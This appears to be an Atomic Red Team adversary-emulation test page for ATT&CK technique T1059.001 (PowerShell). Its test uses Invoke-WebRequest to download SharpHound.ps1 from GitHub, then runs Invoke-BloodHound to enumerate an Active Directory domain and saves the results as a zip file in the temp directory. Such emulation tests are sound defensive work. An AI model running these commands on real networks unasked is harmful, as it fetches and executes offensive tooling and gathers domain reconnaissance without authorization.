
# 1059.001 - Command and Scripting Interpreter: PowerShell

#Description from ATT&CK
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.(Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)


## Atomic Test #2 - Run BloodHound from local disk
Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.

Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.

**Supported Platforms:** Windows


**auto_generated_guid:** a21bb23e-e677-4ee7-af90-6931b57b6350






#### Attack Commands: Run with `powershell`! 


```powershell
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
```

#### Cleanup Commands:
```powershell
Remove-Item $env:Temp\*BloodHound.zip -Force
```



#### Dependencies:  Run with `powershell`!
##### Description: SharpHound.ps1 must be located at "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
```




<br/>
<br/>
